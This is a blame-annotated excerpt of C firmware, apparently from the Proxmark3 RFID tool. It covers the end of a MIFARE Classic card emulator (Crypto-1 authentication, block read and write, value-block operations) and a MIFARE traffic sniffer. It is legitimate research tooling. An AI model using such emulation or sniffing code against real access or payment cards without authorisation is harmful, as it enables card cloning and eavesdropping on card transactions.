2421 cardAUTHSC = receivedCmd[1] / 4; // received block num
2422 cardAUTHKEY = receivedCmd[0] - 0x60;
2423
2424 // --- crypto
2425 crypto1_create(pcs, emlGetKey(cardAUTHSC, cardAUTHKEY));
2426 ans = nonce ^ crypto1_word(pcs, cuid ^ nonce, 0);
2427 num_to_bytes(ans, 4, rAUTH_AT);
2428 EmSendCmd(rAUTH_AT, sizeof(rAUTH_AT));
2429 // --- crypto
2430
2431 cardSTATE = MFEMUL_AUTH1;
9f693930 2432 //nextCycleTimeout = 10;
51969283
M
2433 break;
2434 }
2435 }
0a39986e 2436
8f51ddb0
M
2437 // rule 13 of 7.5.3. in ISO 14443-4. chaining shall be continued
2438 // BUT... ACK --> NACK
2439 if (len == 1 && receivedCmd[0] == CARD_ACK) {
2440 EmSend4bit(mf_crypto1_encrypt4bit(pcs, CARD_NACK_NA));
2441 break;
2442 }
2443
2444 // rule 12 of 7.5.3. in ISO 14443-4. R(NAK) --> R(ACK)
2445 if (len == 1 && receivedCmd[0] == CARD_NACK_NA) {
2446 EmSend4bit(mf_crypto1_encrypt4bit(pcs, CARD_ACK));
2447 break;
0a39986e
M
2448 }
2449
2450 // read block
2451 if (len == 4 && receivedCmd[0] == 0x30) {
51969283 2452 if (receivedCmd[1] >= 16 * 4 || receivedCmd[1] / 4 != cardAUTHSC) {
8f51ddb0
M
2453 EmSend4bit(mf_crypto1_encrypt4bit(pcs, CARD_NACK_NA));
2454 break;
2455 }
2456 emlGetMem(response, receivedCmd[1], 1);
2457 AppendCrc14443a(response, 16);
2458 mf_crypto1_encrypt(pcs, response, 18, &par);
2459 EmSendCmdPar(response, 18, par);
0a39986e
M
2460 break;
2461 }
2462
2463 // write block
2464 if (len == 4 && receivedCmd[0] == 0xA0) {
51969283 2465 if (receivedCmd[1] >= 16 * 4 || receivedCmd[1] / 4 != cardAUTHSC) {
8f51ddb0
M
2466 EmSend4bit(mf_crypto1_encrypt4bit(pcs, CARD_NACK_NA));
2467 break;
2468 }
2469 EmSend4bit(mf_crypto1_encrypt4bit(pcs, CARD_ACK));
9f693930 2470 //nextCycleTimeout = 50;
8f51ddb0
M
2471 cardSTATE = MFEMUL_WRITEBL2;
2472 cardWRBL = receivedCmd[1];
0a39986e 2473 break;
9ca155ba 2474 }
8f51ddb0 2475
0014cb46
M
2476 // works with cardINTREG
2477
2478 // increment, decrement, restore
2479 if (len == 4 && (receivedCmd[0] == 0xC0 || receivedCmd[0] == 0xC1 || receivedCmd[0] == 0xC2)) {
2480 if (receivedCmd[1] >= 16 * 4 ||
2481 receivedCmd[1] / 4 != cardAUTHSC ||
2482 emlCheckValBl(receivedCmd[1])) {
2483 EmSend4bit(mf_crypto1_encrypt4bit(pcs, CARD_NACK_NA));
2484 break;
2485 }
2486 EmSend4bit(mf_crypto1_encrypt4bit(pcs, CARD_ACK));
2487 if (receivedCmd[0] == 0xC1)
2488 cardSTATE = MFEMUL_INTREG_INC;
2489 if (receivedCmd[0] == 0xC0)
2490 cardSTATE = MFEMUL_INTREG_DEC;
2491 if (receivedCmd[0] == 0xC2)
2492 cardSTATE = MFEMUL_INTREG_REST;
2493 cardWRBL = receivedCmd[1];
2494
2495 break;
2496 }
2497
2498
2499 // transfer
2500 if (len == 4 && receivedCmd[0] == 0xB0) {
2501 if (receivedCmd[1] >= 16 * 4 || receivedCmd[1] / 4 != cardAUTHSC) {
2502 EmSend4bit(mf_crypto1_encrypt4bit(pcs, CARD_NACK_NA));
2503 break;
2504 }
2505
2506 if (emlSetValBl(cardINTREG, cardINTBLOCK, receivedCmd[1]))
2507 EmSend4bit(mf_crypto1_encrypt4bit(pcs, CARD_NACK_NA));
2508 else
2509 EmSend4bit(mf_crypto1_encrypt4bit(pcs, CARD_ACK));
2510
2511 break;
2512 }
2513
9ca155ba 2514 // halt
0a39986e 2515 if (len == 4 && (receivedCmd[0] == 0x50 && receivedCmd[1] == 0x00)) {
9ca155ba 2516 LED_B_OFF();
0a39986e 2517 LED_C_OFF();
0014cb46
M
2518 cardSTATE = MFEMUL_HALTED;
2519 if (MF_DBGLEVEL >= 4) Dbprintf("--> HALTED. Selected time: %d ms", GetTickCount() - selTimer);
0a39986e 2520 break;
9ca155ba 2521 }
51969283 2522
8f51ddb0
M
2523 // command not allowed
2524 if (len == 4) {
2525 EmSend4bit(mf_crypto1_encrypt4bit(pcs, CARD_NACK_NA));
2526 break;
2527 }
51969283
M
2528
2529 // case break
2530 break;
8f51ddb0
M
2531 }
2532 case MFEMUL_WRITEBL2:{
2533 if (len == 18){
2534 mf_crypto1_decrypt(pcs, receivedCmd, len);
2535 emlSetMem(receivedCmd, cardWRBL, 1);
2536 EmSend4bit(mf_crypto1_encrypt4bit(pcs, CARD_ACK));
2537 cardSTATE = MFEMUL_WORK;
2538 break;
51969283 2539 } else {
0014cb46 2540 cardSTATE_TO_IDLE();
51969283 2541 break;
8f51ddb0 2542 }
8f51ddb0 2543 break;
50193c1e 2544 }
0014cb46
M
2545
2546 case MFEMUL_INTREG_INC:{
2547 mf_crypto1_decrypt(pcs, receivedCmd, len);
2548 memcpy(&ans, receivedCmd, 4);
2549 if (emlGetValBl(&cardINTREG, &cardINTBLOCK, cardWRBL)) {
2550 EmSend4bit(mf_crypto1_encrypt4bit(pcs, CARD_NACK_NA));
2551 cardSTATE_TO_IDLE();
2552 break;
2553 }
2554 cardINTREG = cardINTREG + ans;
2555 cardSTATE = MFEMUL_WORK;
2556 break;
2557 }
2558 case MFEMUL_INTREG_DEC:{
2559 mf_crypto1_decrypt(pcs, receivedCmd, len);
2560 memcpy(&ans, receivedCmd, 4);
2561 if (emlGetValBl(&cardINTREG, &cardINTBLOCK, cardWRBL)) {
2562 EmSend4bit(mf_crypto1_encrypt4bit(pcs, CARD_NACK_NA));
2563 cardSTATE_TO_IDLE();
2564 break;
2565 }
2566 cardINTREG = cardINTREG - ans;
2567 cardSTATE = MFEMUL_WORK;
2568 break;
2569 }
2570 case MFEMUL_INTREG_REST:{
2571 mf_crypto1_decrypt(pcs, receivedCmd, len);
2572 memcpy(&ans, receivedCmd, 4);
2573 if (emlGetValBl(&cardINTREG, &cardINTBLOCK, cardWRBL)) {
2574 EmSend4bit(mf_crypto1_encrypt4bit(pcs, CARD_NACK_NA));
2575 cardSTATE_TO_IDLE();
2576 break;
2577 }
2578 cardSTATE = MFEMUL_WORK;
2579 break;
2580 }
50193c1e 2581 }
50193c1e
M
2582 }
2583
9ca155ba
M
2584 FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF);
2585 LEDsoff();
2586
0a39986e 2587 // add trace trailer
8f51ddb0 2588 memset(rAUTH_NT, 0x44, 4);
0a39986e
M
2589 LogTrace(rAUTH_NT, 4, 0, 0, TRUE);
2590
0014cb46 2591 if (MF_DBGLEVEL >= 1) Dbprintf("Emulator stopped. Tracing: %d trace length: %d ", tracing, traceLen);
15c4dc5a 2592}
b62a5a84
M
2593
2594//-----------------------------------------------------------------------------
2595// MIFARE sniffer.
2596//
2597//-----------------------------------------------------------------------------
5cd9ec01
M
2598void RAMFUNC SniffMifare(uint8_t param) {
2599 // param:
2600 // bit 0 - trigger from first card answer
2601 // bit 1 - trigger from first reader 7-bit request
39864b0b
M
2602
2603 // C(red) A(yellow) B(green)
b62a5a84
M
2604 LEDsoff();
2605 // init trace buffer
d19929cb 2606 iso14a_clear_trace();
b62a5a84 2607
b62a5a84
M
2608 // The command (reader -> tag) that we're receiving.
2609 // The length of a received command will in most cases be no more than 18 bytes.
2610 // So 32 should be enough!
2611 uint8_t *receivedCmd = (((uint8_t *)BigBuf) + RECV_CMD_OFFSET);
2612 // The response (tag -> reader) that we're receiving.
2613 uint8_t *receivedResponse = (((uint8_t *)BigBuf) + RECV_RES_OFFSET);
2614
2615 // As we receive stuff, we copy it from receivedCmd or receivedResponse
2616 // into trace, along with its length and other annotations.
2617 //uint8_t *trace = (uint8_t *)BigBuf;
2618
2619 // The DMA buffer, used to stream samples from the FPGA
2620 int8_t *dmaBuf = ((int8_t *)BigBuf) + DMA_BUFFER_OFFSET;
5cd9ec01
M
2621 int8_t *data = dmaBuf;
2622 int maxDataLen = 0;
2623 int dataLen = 0;
b62a5a84
M
2624
2625 // Set up the demodulator for tag -> reader responses.
2626 Demod.output = receivedResponse;
2627 Demod.len = 0;
2628 Demod.state = DEMOD_UNSYNCD;
2629
2630 // Set up the demodulator for the reader -> tag commands
2631 memset(&Uart, 0, sizeof(Uart));
2632 Uart.output = receivedCmd;
2633 Uart.byteCntMax = 32; // was 100 (greg)//////////////////
2634 Uart.state = STATE_UNSYNCD;
2635
2636 // Setup for the DMA.
2637 FpgaSetupSsc();
b62a5a84
M
2638 FpgaSetupSscDma((uint8_t *)dmaBuf, DMA_BUFFER_SIZE);
2639
2640 // And put the FPGA in the appropriate mode
2641 // Signal field is off with the appropriate LED
2642 LED_D_OFF();
2643 FpgaWriteConfWord(FPGA_MAJOR_MODE_HF_ISO14443A | FPGA_HF_ISO14443A_SNIFFER);
2644 SetAdcMuxFor(GPIO_MUXSEL_HIPKD);
39864b0b
M
2645
2646 // init sniffer
2647 MfSniffInit();
2648 int sniffCounter = 0;
b62a5a84 2649
b62a5a84
M
2650 // And now we loop, receiving samples.
2651 while(true) {
5cd9ec01
M
2652 if(BUTTON_PRESS()) {
2653 DbpString("cancelled by button");
2654 goto done;
2655 }
2656
b62a5a84
M
2657 LED_A_ON();
2658 WDT_HIT();
39864b0b
M
2659
2660 if (++sniffCounter > 65) {
2661 if (MfSniffSend(2000)) {
55acbb2a 2662 FpgaEnableSscDma();
39864b0b
M
2663 }
2664 sniffCounter = 0;
2665 }
5cd9ec01
M
2666
2667 int register readBufDataP = data - dmaBuf;
2668 int register dmaBufDataP = DMA_BUFFER_SIZE - AT91C_BASE_PDC_SSC->PDC_RCR;
2669 if (readBufDataP <= dmaBufDataP){
2670 dataLen = dmaBufDataP - readBufDataP;
2671 } else {
2672 dataLen = DMA_BUFFER_SIZE - readBufDataP + dmaBufDataP + 1;
2673 }
2674 // test for length of buffer
2675 if(dataLen > maxDataLen) {
2676 maxDataLen = dataLen;
2677 if(dataLen > 400) {
2678 Dbprintf("blew circular buffer! dataLen=0x%x", dataLen);
b62a5a84
M
2679 goto done;
2680 }
2681 }
5cd9ec01 2682 if(dataLen < 1) continue;
b62a5a84 2683
5cd9ec01
M
2684 // primary buffer was stopped( <-- we lost data!
2685 if (!AT91C_BASE_PDC_SSC->PDC_RCR) {
2686 AT91C_BASE_PDC_SSC->PDC_RPR = (uint32_t) dmaBuf;
2687 AT91C_BASE_PDC_SSC->PDC_RCR = DMA_BUFFER_SIZE;
55acbb2a 2688 Dbprintf("RxEmpty ERROR!!! data length:%d", dataLen); // temporary
5cd9ec01
M
2689 }
2690 // secondary buffer sets as primary, secondary buffer was stopped
2691 if (!AT91C_BASE_PDC_SSC->PDC_RNCR) {
2692 AT91C_BASE_PDC_SSC->PDC_RNPR = (uint32_t) dmaBuf;
b62a5a84
M
2693 AT91C_BASE_PDC_SSC->PDC_RNCR = DMA_BUFFER_SIZE;
2694 }
5cd9ec01
M
2695
2696 LED_A_OFF();
b62a5a84 2697
5cd9ec01 2698 if(MillerDecoding((data[0] & 0xF0) >> 4)) {
39864b0b 2699 LED_C_INV();
5cd9ec01 2700 // check - if there is a short 7bit request from reader
71d90e54 2701 if (MfSniffLogic(receivedCmd, Uart.byteCnt, Uart.parityBits, Uart.bitCnt, TRUE)) break;
5cd9ec01 2702
b62a5a84
M
2703 /* And ready to receive another command. */
2704 Uart.state = STATE_UNSYNCD;
39864b0b
M
2705
2706 /* And also reset the demod code */
b62a5a84 2707 Demod.state = DEMOD_UNSYNCD;
b62a5a84
M
2708 }
2709
5cd9ec01 2710 if(ManchesterDecoding(data[0] & 0x0F)) {
39864b0b 2711 LED_C_INV();
b62a5a84 2712
71d90e54 2713 if (MfSniffLogic(receivedResponse, Demod.len, Demod.parityBits, Demod.bitCount, FALSE)) break;
b62a5a84
M
2714
2715 // And ready to receive another response.
2716 memset(&Demod, 0, sizeof(Demod));
2717 Demod.output = receivedResponse;
2718 Demod.state = DEMOD_UNSYNCD;
39864b0b
M
2719
2720 /* And also reset the uart code */
2721 Uart.state = STATE_UNSYNCD;
b62a5a84
M
2722 }
2723
5cd9ec01
M
2724 data++;
2725 if(data > dmaBuf + DMA_BUFFER_SIZE) {
2726 data = dmaBuf;
b62a5a84
M
2727 }
2728 } // main cycle
2729
2730 DbpString("COMMAND FINISHED");
2731
2732done:
55acbb2a 2733 FpgaDisableSscDma();
39864b0b
M
2734 MfSniffEnd();
2735
55acbb2a 2736 Dbprintf("maxDataLen=%x, Uart.state=%x, Uart.byteCnt=%x Uart.byteCntMax=%x", maxDataLen, Uart.state, Uart.byteCnt, Uart.byteCntMax);
b62a5a84 2737 LEDsoff();
3803d529 2738}
Impressum, Datenschutz